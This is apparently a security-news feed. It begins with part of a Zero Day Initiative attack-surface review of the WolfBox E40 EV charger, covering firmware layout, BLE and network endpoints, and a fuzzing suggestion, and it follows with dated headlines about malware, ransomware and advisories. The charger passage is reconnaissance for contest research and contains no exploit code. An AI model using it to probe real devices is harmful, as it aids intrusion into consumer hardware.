Trend ZDI researchers performed an initial analysis of the GigaDevice firmware.As is typical for MCU-based devices, the firmware is one solid blob without any discernible structure such as a filesystem. Upon analyzing ASCII strings present in the dumped firmware image, it became obvious the firmware is built on top of uC/OS II, an embedded real-time operating system (RTOS). Multiple references to mBedTLS version 2.16.4 are also visible. Alongside that, there are multiple AT commands. This suggests the MCU handles communications via a missing wireless module. However, in the present configuration, it would seem the bulk of handling Wi-Fi, BLE, TCP/IP, and TLS falls upon the communications module.Unfortunately, there were not too many useful strings encountered in the communications module firmware. Most were JSON data which looked like logging records of some sort. The image itself appears to be partitioned as follows, with spans of unprogrammed memory in between: · 0x000000: medium entropy; machine code. This is the bootloader.· 0x011000: medium entropy; machine code. This is the application.· 0x12B000: high entropy; unknown. This appears to be encrypted in ECB mode.· 0x1CF000: high entropy; unknown. This appears to be encrypted in ECB mode.· 0x1D0000: low entropy; marked as “TLV”.· 0x1D2000: low entropy; this could be some kind of filesystem. This is where log-like JSON data was identified.· 0x1ED000: high entropy; unknown. This appears to be encrypted in ECB mode. Worth noting: Tuya provides SDK source code access for BK7231N, which may prove useful during reverse engineering and vulnerability research efforts. That said, Trend ZDI did not verify whether there were any changes made for WolfBox products.Bluetooth Low Energy (BLE) AnalysisUsing a BLE scanning tool, the Trend ZDI researchers observed the following Bluetooth LE endpoints on the WolfBox E40.When powered on, the device is visible under the name `TUYA_`. The device exposes a single service with three characteristics. It is reasonable to assume this is what the mobile application uses to discover the device. Additional information can be likely obtained by reverse engineering the mobile application.Network Traffic AnalysisThe charger can connect to a local Wi-Fi network. Trend ZDI researchers connected one device to investigate the network-side attack surface exposed by the device. During the initial setup, the charger reached out to h3-eu.iot-dns.com (alias of a3480a15a4710bb9d.awsglobalaccelerator.com, IP address 15.197.184.59) via HTTPS. This was followed by TCP port 443 connections to IP address 18.195.249.137, which had no prior DNS queries, and then again followed by a connection to 18.185.146.33 (AWS), TCP port 8886. UDP communication over port 7000 was also observed. Initially, the phone sent out packets to this port to broadcast addresses and received a response from the device’s address. The packet contents are, unfortunately, encrypted in some way. Figure 6 - Observed network communications The phone also reached out to TCP port 6668 on the device. The observed traffic followed the same format with mostly encrypted payloads. After the app checked for software updates and was allowed to update to the latest version, the device queried DNS for fireware-ttls.tuyaeu.com (alias of tuya-fireware-update-8b783aab86e29e3a.elb.eu-central-1.amazonaws.com, IP 18.197.251.244) and connected to TCP port 2443 (protected by TLS) and proceeded to download the update. The device rebooted immediately after the download. Having completed the update, the device queried DNS for m3.tuyaeu.com (alias of out-mqtt-tytls-43c09399a95b9ab8.elb.eu-central-1.amazonaws.com, IP 18.185.146.33 – matching the prior IP) and connected to TCP port 8886 there. This was followed by a query for a3.tuyaeu.com (IP 18.195.249.137 – matching the prior IP) and a connection to TCP port 443 there as well. The device kept TCP port 6668 open for connections over Wi-Fi. Of note, in-app actions related to device configuration (e.g., LED setup) resulted in communications over that connection. Further research into the encrypted local communications pointed to this being a Tuya-specific protocol. Open-source implementations exist for it as well, such as the tuyapi library. This could be used as a good starting point in building a fuzzer for this protocol.SummaryWhile these may not be the only attack surfaces available on the WolfBox E40 unit, they represent the most likely avenues a threat actor may use to exploit the device. We’re excited to see what research is displayed in Tokyo during the Pwn2Own Automotive event. Stay tuned to the blog for attack surface reviews for other devices, and if you’re curious, you can see all the devices included in the contest.Until then, you can find me on Mastodon at @infosecdj, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2024-12-03 17:50:47
Cyber-Unsafe Employees Increasingly Put Orgs at RiskToo much access and privilege, plus a host of unsafe cyber practices, plague most workplaces, and the introduction of tools like GenAI will only make things worse.
by Dark Reading
2024-12-03 17:48:41
Hai’s Latest Evolution: Intelligence, Context, and More Intuitive UXHai’s Latest Evolution: Intelligence, Context, and More Intuitive UX Martijn Russchen Tue, 12/03/2024 - 09:48 Body Transforming Security Program Management: A Day with HaiPicture this: It''s Monday morning, and your dashboard shows fifteen new vulnerability reports from the weekend. Your team meeting is in an hour, and the CISO wants an update on quarterly trends. Sound familiar?Enter Hai. With its expanded capabilities, Hai simplifies your workload, creating polished data visualizations, spotting critical trends, and streamlining your workflows. Here’s how:1. Hai Program Insights: Instantly Understand Your ProgramsStop spending hours compiling data from individual programs. With Hai, actionable insights are just a question away. Whether prepping for a team meeting or analyzing quarterly performance, Hai delivers clarity with visualized metrics and trends.Examples in Action:“What’s our current report volume compared to last month?”“Show me how many critical vulnerabilities were reported this quarter.”“How much did we pay per asset this year?”With the addition of HackerOne Benchmarks, Hai also supports benchmarking capabilities. For example, you can ask:“How does my program’s report volume compare to industry benchmarks?”That elusive quarterly trend data? Hai gathers it from all relevant programs, presenting it in meaningful visualizations with actionable insights. By instantly surfacing tailored intelligence, Hai lets you focus on decision-making, scale cross-program mitigations, and prioritize work where it matters most.Hai retains the complete history of your conversation, allowing you to ask multiple questions in a row while keeping track of the background. For example, suppose you’re conducting a program performance analysis and must report it to your leadership. In that case, you can simply ask Hai to summarize all the information collected so far and format it in a specific way, such as an email. 2. Contextual Conversation When It MattersImagine reviewing a complex vulnerability report and needing to pause to find additional information or instructions. Instead of digging through documentation or searching for answers, Hai delivers instant context. Its intelligent sidebar provides tailored suggestions based on your current task, whether explaining technical details or analyzing trends in your bounty spend.Example in Action:While analyzing an SQL injection vulnerability, Hai might suggest:Relevant remediation guidanceKey implications for your system security.Follow-up actions to mitigate riskWith Hai, you’re never working alone—it’s like having an expert by your side. By providing on-the-spot insights and actionable recommendations, Hai helps you breeze through your report backlog, improve accuracy, and streamline team communication.3. Improved UX: Seamless, Smarter WorkflowsHai’s updated interface introduces a sleek new sidebar, transforming how you interact with your intelligent copilot. This streamlined design ensures that intelligence is always within reach and seamlessly integrated into your workflow. With intuitive follow-up suggestions, the sidebar guides you naturally from one task to the next, helping you stay focused and maximizing productivity. From Information Overload to Instant InsightThe real power of Hai lies in its ability to remove the administrative burden from security teams. Instead of wrestling with platform navigation, hunting for instructions, or compiling scattered data, you can focus on making strategic security decisions. It’s easy to get started with Hai program insights, creating powerful data visualizations and increasing cross-program efficiency. In fact, since its launch in April, Hai’s adoption has surged by 170%, helping countless customers work faster and smarter. Curious how much time your team could reclaim? Book a 15-minute Hai demonstration and bring your toughest program challenges—Hai has the answers. Excerpt Hai, HackerOne''s AI copilot has 3 new capabilities: Hai analytics, contextual conversations, and an enhanced user experience. Main Image
by HackerOne
2024-12-03 17:01:19
New Celestial Stealer JavaScript MaaS Platform Springs into ActionCybersecurity researchers at Trellix Advanced Research Center have unearthed Celestial Stealer, a novel Malware-as-a-Service (MaaS) offering targeting Windows 10 and 11 systems. This JavaScript-based infostealer is sold via Telegram and is designed to harvest sensitive user data from browsers, cryptocurrency wallets, and popular applications such as Discord and Steam. Celestial Stealer came to light during … The post New Celestial Stealer JavaScript MaaS Platform Springs into Action appeared first on CyberInsider.
by Cyber Insider
2024-12-03 16:51:09
’Tis the season to avoid holiday email scamsAs the holidays approach, businesses are busier than ever, and cybercriminals know it. Along with cheer, joy, and giving, the holidays also bring an unfortunate surge in cyber scams.
by Barracuda
2024-12-03 16:50:35
US Data Brokers Face FTC’s Wrath Over Tracking Consumers OnlineThe Federal Trade Commission (FTC) has taken decisive action against Gravy Analytics and its subsidiary Venntel for unlawfully collecting and selling sensitive location data, which could reveal consumers'' visits to highly sensitive sites. The FTC''s proposed settlement bars the companies from using or selling such data and mandates the deletion of past location records. Gravy … The post US Data Brokers Face FTC’s Wrath Over Tracking Consumers Online appeared first on CyberInsider.
by Cyber Insider
2024-12-03 16:19:13
Venom Spider Spins Web of New Malware for MaaS PlatformA novel backdoor malware and a loader that customizes payload names for each victim have been added to the threat group''s cybercriminal tool set.
by Dark Reading
2024-12-03 15:53:39
Sophos named a Gartner® Peer Insights™ Customers’ Choice for Managed Detection and Response (MDR) Services for the 2nd timeSophos is the only vendor named a Customers’ Choice across Endpoint Protection Platforms, Network Firewalls, and Managed Detection and Response
by Sophos News
2024-12-03 15:47:00
NachoVPN Tool Exploits Flaws in Popular VPN Clients for System CompromiseCybersecurity researchers have disclosed a set of flaws impacting Palo Alto Networks and SonicWall virtual private network (VPN) clients that could be potentially exploited to gain remote code execution on Windows and macOS systems. ""By targeting the implicit trust VPN clients place in servers, attackers can manipulate client behaviours, execute arbitrary commands, and gain high levels of access
by The Hacker News
2024-12-03 15:36:42
Intel CEO Forced Out by Board Frustrated With Slow ProgressGelsinger was given the option to retire or be removed.
by ITPro Today
2024-12-03 15:21:00
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft AttacksThe North Korea-aligned threat actor known as Kimsuky has been linked to a series of phishing attacks that involve sending email messages that originate from Russian sender addresses to ultimately conduct credential theft. ""Phishing emails were sent mainly through email services in Japan and Korea until early September,"" South Korean cybersecurity company Genians said. ""Then, from mid-September,
by The Hacker News
2024-12-03 15:20:56
FTC bans two data brokers from collecting and selling Americans’ sensitive location dataUS-based Gravy Analytics and Mobilewalla must also delete historic data collected on millions of Americans. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-03 15:19:17
Agentic AI Set To Rise, With New Cybersecurity Risks: GartnerThe autonomous technology could help CIO’s deliver their AI goals but needs legal and ethical guidelines.
by ITPro Today
2024-12-03 15:00:00
Ransomware's Grip on HealthcareUntil C-level executives fully understand potential threats and implement effective mitigation strategies, healthcare organizations will remain vulnerable and at risk of disruption.
by Dark Reading
2024-12-03 15:00:00
2025 Cybersecurity Trends That Redefine Resilience, Innovation, and TrustExplore how 2025’s biggest cybersecurity trends—AI-driven attacks, deepfakes, and platformization—are reshaping the security landscape. The post 2025 Cybersecurity Trends That Redefine Resilience, Innovation, and Trust appeared first on NetSPI.
by NetSPI
2024-12-03 14:59:00
KnowBe4 Releases the Latest Phishing Trends in Q3 2024 Phishing Report, With QR Code Phishing on the RiseKnowBe4, the world-renowned cybersecurity platform that comprehensively addresses human risk management, today released its Q3 2024 Phishing Report. This quarter’s findings reveal the most frequently clicked email subjects in simulated phishing tests, demonstrating the continued efficacy of HR and IT-related phishing attempts.   KnowBe4’s Q3 2024 Phishing Report reveals that HR and IT-related phishing emails […] The post KnowBe4 Releases the Latest Phishing Trends in Q3 2024 Phishing Report, With QR Code Phishing on the Rise appeared first on IT Security Guru.
by IT Security Guru
2024-12-03 14:00:00
A Note From the Editor-in-ChiefA change in ownership and what it means for our readers.
by ITPro Today
2024-12-03 14:00:00
CyberheistNews Vol 14 #49 [Heads Up] Bad Actor Uses Deepnude AI Image Generator to Lure And Infect Users
by KnowBe4
2024-12-03 14:00:00
Third-party access: The overlooked risk to your data protection planA recent IBM Cost of a Data Breach report reveals a startling statistic: Only 42% of companies discover breaches through their own security teams. This highlights a significant blind spot, especially when it comes to external partners and vendors. The financial stakes are steep. On average, a data breach affecting multiple environments costs a whopping […] The post Third-party access: The overlooked risk to your data protection plan appeared first on Security Intelligence.
by Security Intelligence
2024-12-03 13:50:10
Introducing Flex 3.0: Elevating Threat Detection in a Dynamic LandscapeIn today''s rapidly evolving threat landscape, cyber defense is more crucial than ever. As we introduce Flex 3.0, let’s first look at what drives the need for a stronger, smarter approach to detection. Advanced persistent threats (APTs) and sophisticated attacker tactics are now part of the norm. Modern attackers are faster and more creative, taking mere hours to move from initial compromise to reaching their objectives. Yet, detecting an attacker often takes days—sometimes even months. The post Introducing Flex 3.0: Elevating Threat Detection in a Dynamic Landscape appeared first on AttackIQ.
by AttackIQ
2024-12-03 13:36:04
All UPI IDs in India have Predictable Patterns that allow the disclosure of mail IDsRead free …Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-03 13:30:00
'White FAANG'' Data Export Attack: A Gold Mine for PII ThreatsWebsites these days know everything about you — even some details you might not realize. Hackers can take advantage of that with a sharp-toothed attack that exploits Europe''s GDPR-mandated data portability rules.
by Dark Reading
2024-12-03 13:27:31
Why Phishers Love New TLDs Like .shop, .top and .xyzPhishing attacks increased nearly 40 percent in the year ending August 2024, with much of that growth concentrated at a small number of new generic top-level domains (gTLDs) -- such as .shop, .top, .xyz -- that attract scammers with rock-bottom prices and no meaningful registration requirements, new research finds. Meanwhile, the nonprofit entity that oversees the domain name industry is moving forward with plans to introduce a slew of new gTLDs.
by Krebs on Security
2024-12-03 13:13:58
Alleviating Alert Fatigue with an MSSPBy Euan Carswell, SOC Team Lead at Barrier Networks Everyone can relate to the 7AM alarm call. You can be in a deep sleep when suddenly your ears are met with an incessant pinging that won’t stop until you muster the energy to hit snooze. This is a morning ritual for many. The alarm clock […] The post Alleviating Alert Fatigue with an MSSP appeared first on IT Security Guru.
by IT Security Guru
2024-12-03 13:00:00
Top US Consumer Watchdog Has a Plan to Fight Predatory Data BrokersA new proposal by the Consumer Financial Protection Bureau would use a 54-year-old privacy law to impose new oversight of the data broker industry. But first, the agency must survive Elon Musk.
by WIRED Security News
2024-12-03 12:46:36
Ducks, dinosaurs, and XSS: A little knowledge is a dangerous thing in securitySecurity vulnerabilities are often misunderstood and underestimated. Based on superficial application security knowledge, you might say that cross-site scripting is people putting script tags in form fields. And that’s basically true—but only in the same way as saying ducks are basically dinosaurs. Allow me to explain. The post Ducks, dinosaurs, and XSS: A little knowledge is a dangerous thing in security appeared first on Invicti.
by Invicti
2024-12-03 12:41:02
Apple Faces Privacy Lawsuit: Employee Alleges Invasive Device MonitoringA current Apple employee has filed a lawsuit against the tech giant, accusing the company of using invasive surveillance tactics on its workers’ personal devices. The Apple lawsuit, filed on Sunday evening in California state court, puts allegations that Apple monitors employees’ private iCloud accounts and non-work-related devices without their consent. The plaintiff, Amar Bhakta, has been employed by Apple in the advertising technology sector since 2020. Bhakta claims that Apple’s policies force employees to surrender their privacy rights, enabling the company to conduct “physical, video, and electronic surveillance” of workers not just during their working hours, but also when they are off-duty and even after they leave the company. The suit alleges that these practices violate California''s strict privacy laws. Bhakta''s legal action points to a broader issue regarding Apple’s employment practices, accusing the company of creating policies that infringe on the personal privacy of its employees. The suit outlines a range of policies that allegedly place Apple employees under constant scrutiny, both on and off the job. The Apple Lawsuit: Invasive Surveillance Tactics According to the Apple lawsuit, the tech giant has established policies that force employees to integrate their work and personal lives digitally in ways that allow the company to monitor their actions beyond the workplace. One of the central issues raised in the lawsuit is Apple’s requirement that employees use Apple-made devices for work purposes. This stipulation, the suit argues, often results in workers using their personal Apple devices, which are connected to their personal iCloud accounts. According to Semafor, the lawsuit further claims that by using their own devices for work, employees unknowingly grant Apple the ability to access virtually any data on those devices. This includes emails, photos, videos, and other personal information. Apple’s internal privacy policy allegedly states that if an employee uses their personal iCloud account on an Apple-managed device, the company can search and access any data stored on that device, including real-time location data. This level of access has raised concerns among former Apple employees, who have previously complained about the company’s ability to monitor personal information. Apple’s Response and Legal Representation In response to the Apple lawsuit, the firm has strongly denied the allegations, insisting that the company upholds its employees'' rights to privacy. Every employee has the right to discuss their wages, hours, and working conditions, and this is part of our business conduct policy, which all employees are trained on annually,"" the company said in a statement. Bhakta is represented by Chris Baker of Baker Dolinko & Schwartz, alongside Jahan Sagafi from Outten & Golden. Both attorneys have experience in handling high-profile cases against large technology companies. Baker, in particular, has filed several lawsuits against tech giants concerning allegedly unlawful employment practices. Impact on Employee Freedom and Privacy The lawsuit against Apple also highlights the restrictive nature of the company''s policies regarding digital privacy. The suit claims that Apple actively discourages employees from maintaining separate work and personal iCloud accounts. Instead, employees are encouraged to use a single iCloud account that merges their work and personal lives, thereby granting Apple more access to their private information. This digital integration, according to the lawsuit, creates an environment in which Apple can monitor employees’ personal activities even when they are off the clock. Employees are said to have limited options to avoid this surveillance, with the only alternative being to use a work-owned device and a separate iCloud account exclusively for work purposes. However, the suit asserts that Apple discourages this practice. Legal Action Under California’s Labor Laws Bhakta’s lawsuit was filed under the California Private Attorneys General Act (PAGA), which permits employees to sue on behalf of the state for labor violations. If the court finds Apple guilty of violating state labor laws, the company could be subjected to penalties, which would be multiplied by the number of employees affected by the alleged surveillance. This lawsuit against Apple highlights ongoing concerns over digital privacy in the workplace. As more employees find themselves bound by the company''s restrictive policies, the case has the potential to set a precedent for how tech companies handle employee surveillance and personal privacy. With the backing of California state law, Bhakta’s legal team aims to hold Apple accountable for any violations, especially if the company''s actions have impacted a large number of its employees.
by The Cyber Express
2024-12-03 12:41:00
Flipper Zero goes retro with this cool limited-edition transparent versionIf you want one, you''d better act fast.
by ZDNET Security
2024-12-03 12:40:00
LastPass adds passkey support for free and premium usersLastPass users can take another step toward a password-less world. Here''s how to activate the beta feature now.
by ZDNET Security
2024-12-03 12:37:30
DESC Leads Dubai’s Journey to Becoming the World’s Safest Digital CityOverview Dubai is making significant strides in integrating advanced technologies while emphasizing strong cybersecurity frameworks. A recent study by the World Economic Forum (WEF), titled ""Navigating Cyber Resilience in the Age of Emerging Technologies,"" highlights how the city is utilizing technologies such as artificial intelligence (AI), blockchain, quantum computing, and smart city solutions across critical sectors. The Dubai Electronic Security Center (DESC) plays a central role in supporting the secure adoption of these emerging technologies. Initiatives such as the Dubai Cyber Security Strategy and the UAE National Strategy for Artificial Intelligence 2031, along with policies like the Dubai AI Security Policy and autonomous vehicle security standards, aim to balance innovation with a focus on digital security. This blog delves into DESC''s contributions, Dubai’s cybersecurity strategies, and the city’s efforts to enhance cyber resilience and enable secure digital transformation. The Role of DESC in Dubai’s Cybersecurity Strategy The Dubai Electronic Security Center (DESC) is at the heart of Dubai’s digital transformation. As a key player in Dubai’s Cyber Security Strategy, DESC focuses on securing digital assets, fostering innovation, and establishing Dubai as a leading secure digital hub. His Excellency Yousuf Hamad Al Shaibani, CEO of DESC, highlighted the center’s proactive measures, saying, “The Center continues to coordinate with governmental, regional, and international entities to study the security requirements of modern and emerging technologies and set standards and controls that ensure their safe adoption across various sectors.” DESC has introduced multiple initiatives to ensure the secure implementation of emerging technologies: Dubai AI Security Policy: A framework for safe use of AI technologies across sectors. Autonomous Vehicle Security Specification: The first of its kind globally, providing security standards for self-driving vehicles. RZAM Cybersecurity Application: A real-time solution leveraging AI to protect internet users from malicious websites and phishing attacks. These policies stress Dubai’s efforts to create a secure environment for the adoption of advanced technologies. Advancing Emerging Technologies Dubai’s leadership in cybersecurity is closely aligned with the UAE National Strategy for Artificial Intelligence 2031. This strategy, combined with substantial investments in technologies such as quantum computing, 5G communications, and the Internet of Things (IoT), is designed to drive innovation while maintaining robust digital safeguards. For example, DESC has been instrumental in supporting Dubai’s Self-Driving Transport (SDT) Strategy. The SDT Strategy aims to convert 25% of Dubai’s total transportation to self-driving vehicles by 2030. To achieve this, DESC recently published a study on connected vehicles, highlighting the security specifications required to mitigate cyber risks in IoT-enabled transport systems. The Economic Impact of AI Artificial intelligence is central to Dubai’s digital transformation efforts. The WEF report estimated that AI will contribute USD 320 billion to the UAE economy by 2030. In line with this, DESC issued a detailed study examining AI’s potential across various sectors in Dubai. This study analyzed: AI’s Economic Contributions: Estimating how AI can drive Dubai’s economic growth. Ethical and Societal Considerations: Exploring the implications of widespread AI adoption. Risk Mitigation: Identifying challenges and solutions for safe AI integration. Stakeholder Collaboration: Promoting partnerships to enhance AI research and application. These efforts are part of a broader vision to position Dubai as a global hub for AI research, development, and implementation. Global Partnerships and Regulatory Frameworks DESC has also been instrumental in establishing partnerships with public and private stakeholders at both local and international levels. By collaborating with research institutions and global technology leaders, Dubai is developing regulatory frameworks to safely integrate cutting-edge technologies. These partnerships are crucial in fostering an environment where innovation can thrive without compromising security. Policies such as the Dubai AI Security Policy and the autonomous vehicle security standards reflect the city’s commitment to balancing innovation with cybersecurity. Building a Resilient Digital Infrastructure Dubai’s success in integrating new technologies is rooted in its digital infrastructure and forward-looking strategies. The Dubai Cyber Security Strategy serves as a guiding framework for ensuring the resilience and reliability of digital systems. By focusing on key areas like secure IoT adoption, AI governance, and blockchain implementation, DESC is driving Dubai’s vision of a smart and secure city. These efforts are complemented by national initiatives such as the UAE’s investments in advanced communication technologies like 5G and quantum computing. The Future of Cyber Resilience in Dubai Dubai’s approach to cybersecurity offers valuable lessons for other cities and nations seeking to embrace emerging technologies. With DESC leading the charge, Dubai is not only addressing present-day challenges but also preparing for future risks associated with digital transformation. Its comprehensive strategies and global collaborations ensure that innovation is securely integrated into all aspects of life. References: https://www.desc.gov.ae/world-economic-forum-study-highlights-descs-innovative-efforts-in-securing-emerging-technologies/ The post DESC Leads Dubai’s Journey to Becoming the World’s Safest Digital City appeared first on Cyble.
by CYBLE
2024-12-03 12:08:21
Inside Akira Ransomware’s Rust ExperimentExecutive Summary Introduction Earlier this year, Talos published an update on the ongoing evolution of Akira ransomware-as-a-service (RaaS) that has become one of the more prominent players in the current ransomware landscape. According to this update, for a while in early 2024, Akira affiliates experimented with promoting a new cross-platform variant of the ransomware called […] The post Inside Akira Ransomware’s Rust Experiment appeared first on Check Point Research.
by Check Point Research
2024-12-03 11:25:04
CISA Releases Updated TIC 3.0 Security Capabilities Catalog (SCC) Version 3.2Overview The Cybersecurity and Infrastructure Security Agency (CISA) has published the updated version of the Trusted Internet Connections (TIC) 3.0 Security Capabilities Catalog (SCC) version 3.2. This new release incorporates essential updates based on the latest National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) Version 2.0, ensuring that TIC continues to adapt to modern technologies. The SCC provides a comprehensive set of deployable security controls, capabilities, and best practices to assist federal agencies in implementing secure network environments. With this update, the catalog enhances the guidance for the secure implementation of technology solutions and ensures agencies remain compliant with cybersecurity standards. The TIC 3.0 SCC serves as a foundational guide for federal agencies, enabling them to meet stringent security requirements across various computing environments. It offers a thorough catalog of security capabilities designed to protect federal information and mitigate cyber risks. By leveraging the latest NIST CSF mappings, the catalog helps agencies strengthen their cybersecurity postures through a series of strategic and technical security measures. One of the important aspects of the TIC 3.0 SCC Version 3.2 is its alignment with the NIST CSF, which is structured around the core functions of Govern, Identify, Protect, Detect, Respond, and Recover. This mapping ensures that the security controls and capabilities within the catalog are aligned with best practices in risk management, incident detection, and threat response. The Role of the Security Capabilities Catalog The SCC is an important resource that assists agencies in applying best practices and risk management principles to protect information in various computing scenarios. This includes guidance for different networking environments, such as cloud, mobile, and traditional on-premises infrastructure. As the federal government continues to transition to more decentralized and cloud-based environments, the TIC 3.0 SCC helps agencies ensure that they maintain security measures across their entire IT ecosystem. Agencies are encouraged to apply guidance within the SCC to identify potential risks and implement compensating controls when necessary. These controls address potential gaps or residual risks that might remain after deploying the recommended security capabilities. Additionally, CISA emphasizes the importance of collaborating with vendors to ensure that security solutions are adequately implemented, configured, and maintained. This collaboration ensures that agencies can fulfill security requirements and remain protected. Security Objectives of Security Capabilities Catalog TIC 3.0 The TIC program outlines a set of security objectives aimed at mitigating risks and securing federal data as it moves through various trust zones. As federal agencies increasingly leverage cloud and mobile services, TIC’s security objectives are designed to provide consistent and scalable protections regardless of where the data resides or how it is transmitted. The objectives of TIC 3.0 include: Manage Traffic: This objective focuses on observing and filtering data connections to ensure they align with authorized activities. It also applies the principle of least privilege and default-deny policies. Protect Traffic Confidentiality: This ensures that only authorized parties can access data in transit, protecting the confidentiality of sensitive government communications. Protect Traffic Integrity: The integrity of data during transmission is critical to prevent and detect any alterations that could indicate a cyberattack or data breach. Ensure Service Resiliency: With cyber threats constantly evolving, the ability to ensure the continuous operation of critical services and applications is a central focus of TIC 3.0. Ensure Effective Response: This objective encourages agencies to establish processes for timely responses to cybersecurity incidents, with a focus on adapting security policies as new threats emerge. These objectives are designed to align with the functions of the NIST Cybersecurity Framework, ensuring that TIC 3.0 offers a comprehensive approach to securing federal networks. Universal and PEP Security Capabilities The SCC is divided into two main sections: Universal Security Capabilities and PEP (Policy Enforcement Point) Security Capabilities. These capabilities are critical in securing federal networks and ensuring agencies can manage cybersecurity risks efficiently. Universal Security Capabilities Universal security capabilities are high-level principles that are applicable to all federal agencies, irrespective of their individual use cases. These capabilities help agencies implement broad cybersecurity measures that apply to enterprise-level risks. Some of the key universal security capabilities include: Backup and Recovery: Ensures data and configurations are backed up and can be quickly restored after an incident, failure, or corruption. Central Log Management with Analysis: This function collects, stores, and analyzes telemetry to support security analysis and detect malicious activity. Incident Response Planning and Handling: Helps agencies prepare for and respond to cyberattacks, ensuring that recovery and detection measures are in place. Least Privilege: Grants minimum resources and authorizations necessary for entities to perform their functions, reducing exposure to potential threats. Patch Management: Identifies, acquires, installs, and verifies patches to secure systems from known vulnerabilities. These capabilities are mapped to the NIST CSF, providing a comprehensive set of actions for each area. This ensures that agencies can implement the appropriate security measures based on the severity of the risk. PEP Security Capabilities The PEP capabilities focus on specific technical implementations and are more granular in nature. These capabilities support the TIC 3.0 security objectives and are aligned with Zero Trust Architectures. For example, the following PEP security capabilities are critical in network environments: Anti-malware: Detects and quarantines malicious code that could compromise the integrity of the network. Network Segmentation: Divides networks to reduce attack surfaces and limit the potential spread of cyber threats. Multi-factor Authentication: Adds an additional layer of authentication, ensuring that only authorized users gain access to sensitive data. These PEP capabilities can be adapted depending on the agency’s specific requirements, such as the use of cloud, email, web, or network security solutions. Conclusion As cybersecurity threats become increasingly sophisticated, the TIC 3.0 SCC will continue to adapt to new changes. The document is periodically updated to reflect new security practices and technologies. Agencies are encouraged to actively engage with CISA and vendors to ensure that their implementations remain effective. The TIC 3.0 SCC version 3.2 is a crucial update in protecting federal networks. As agencies adopt more complex computing environments, the need for new and upgraded security measures like the Security Capabilities Catalog, Trusted Internet Connections, and TIC frameworks grows. This updated catalog equips agencies with the tools to understand these challenges, ensuring the protection of sensitive information while maintaining secure operations. References https://www.cisa.gov/news-events/news/updated-tic-30-security-capabilities-catalog-scc-v32 https://www.cisa.gov/sites/default/files/2024-11/TIC%203.0%20Security%20Capabilities%20Catalog508%20v3.2%20%28Volume%203%29.pdf https://www.cisa.gov/sites/default/files/publications/CISA_TIC%203.0%20Vol.%202%20Reference%20Architecture.pdf#:~:text=The%20purpose%20of%20the%20TIC%203.0%20Reference%20Architecture,cases.%20The%20Reference%20Architecture%20can%20be%20leveraged%20to%3A The post CISA Releases Updated TIC 3.0 Security Capabilities Catalog (SCC) Version 3.2 appeared first on Cyble.
by CYBLE
2024-12-03 11:22:47
ENGlobal IT systems impacted by ransomware attackThe attack marks at least the third disruptive cyberattack impacting energy sector providers based in Texas since August.
by Cybersecurity Dive
2024-12-03 10:53:00
Horns&Hooves Campaign Delivers RATs via Fake Emails and JavaScript PayloadsA newly discovered malware campaign has been found to target private users, retailers, and service businesses mainly located in Russia to deliver NetSupport RAT and BurnsRAT. The campaign, dubbed Horns&Hooves by Kaspersky, has hit more than 1,000 victims since it began around March 2023. The end goal of these attacks is to leverage the access afforded by these trojans to install stealer
by The Hacker News
2024-12-03 10:00:00
State of IT Report 2025: Security and AI Drive Growth Despite Economic PressuresSpiceworks'' 2025 State of IT report shows increased tech spending amid rising costs and AI investments.
by ITPro Today
2024-12-03 10:00:00
US agency proposes new rule blocking data brokers from selling Americans’ sensitive personal dataThe U.S. consumer protection agency said it''s closing the loophole to block the ""widespread evasion"" of federal law by data brokers. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-03 09:49:43
US government contractor ENGlobal says operations are ‘limited’ following cyberattackENGlobal Corporation, a provider of engineering and automation services to the U.S. energy sector and federal government, says it has restricted access to its IT systems following a cyberattack, limiting the company to essential business operations only. In an 8-K filing with the SEC on Monday, Texas-based ENGlobal said it became aware of a “cybersecurity […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-03 09:00:00
Note from the Editor-in-ChiefA change in ownership and what it means for our readers.
by Cybersecurity Dive
2024-12-03 08:31:00
UK cyber chief warns country is at an inflection point as digital threats riseIn his first major speech, NCSC CEO Richard Horne said state linked and criminal threat groups are working to undermine the nation’s reliance on technology.
by Cybersecurity Dive
2024-12-03 00:00:00
One Year of Falcon Go: Transforming Cybersecurity for Small Businesses
by CrowdStrike
2024-12-03 00:00:00
2024 State of Threat Intelligence InfographicDiscover key insights from 550+ cybersecurity experts on threat intelligence trends, spending, and strategies in our 2024 infographic. Learn more.
by Recorded Future
2024-12-03 00:00:00
Discovering a Deserialization Vulnerability in LINQPad<p>Like most red teamers, I spend quite a lot of time looking for novel vulnerabilities that could be used for initial access or lateral movement. Recently, my focus has been on deserialization vulnerabilities in .NET…</p>
by TrustedSec
2024-12-03 00:00:00
ZDI-24-1642: Linux Kernel nftables Type Confusion Information Disclosure VulnerabilityThis vulnerability allows local attackers to disclose sensitive information on affected installations of the Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 3.8. The following CVEs are assigned: CVE-2024-42070.
by Zero Day Initiative Advisories
2024-12-03 00:00:00
ZDI-24-1641: Intel Computing Improvement Program PyInstaller Local Privilege Escalation VulnerabilityThis vulnerability allows local attackers to escalate privileges on affected installations of Intel Computing Improvement Program. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2023-49797.
by Zero Day Initiative Advisories
2024-12-02 23:59:00
Last Week in Security (LWiS) - 2024-12-02Windows LPE (@SecuriTeam_SSD), Nighthawk 0.3.3 (@MDSecLabs), Advanced Cobalt Strike Usage (@_RastaMouse), Webcam LED control (@andreyknvl), AI/ML attacks (@olivier_boschko), and more!
by Bad Sector Labs
2024-12-02 23:00:10
Threat Assessment: Howling Scorpius (Akira Ransomware)Howling Scorpius, active since 2023, uses Akira ransomware to target businesses globally, employing a double-extortion strategy and upgrading tools regularly. The post Threat Assessment: Howling Scorpius (Akira Ransomware) appeared first on Unit 42.
by Palo Alto Networks - Unit42
2024-12-02 21:52:54
'Bootkitty'' First Bootloader to Take Aim at LinuxThough it''s still just a proof of concept, the malware is functional and can evade the Secure Boot process on devices from multiple vendors.
by Dark Reading
